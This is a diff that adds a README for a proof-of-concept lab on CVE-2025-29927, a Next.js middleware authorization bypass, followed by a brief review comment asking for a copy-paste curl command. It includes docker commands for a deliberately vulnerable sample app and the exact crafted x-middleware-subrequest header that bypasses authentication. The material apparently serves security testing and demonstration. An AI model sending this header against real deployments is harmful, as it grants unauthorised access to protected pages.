proof-of-concept-exploits/nextjs-cve-2025-29927/README.md

```diff
@@ -0,0 +1,23 @@
+# Next.js Middleware Exploit: CVE-2025-29927 Authorization Bypass POC
+This folder contains a sample web application vulnerable to [CVE-2025-29927](https://zeropath.com/blog/nextjs-middleware-cve-2025-29927-auth-bypass), an authorization bypass vulnerability in NextJS when an attacker adds a specially-crafted HTTP header.
+
+## Running the application
+
+Run it:
+
+
+```
+docker build . -t vulnerable-app
+docker run -p 3000:3000 --name vulnerable-app --rm vulnerable-app
+```
+
+## Exploitation steps
+
+The application has a private endpoint `/private` that is accessible only by authenticated users.  
+
+
+You can bypass authentication by adding the following HTTP header to the request:
+
+```
+x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```

Comment:
Can you add a curl or wget command directly so that people can copy / paste for testing?

Reply:
done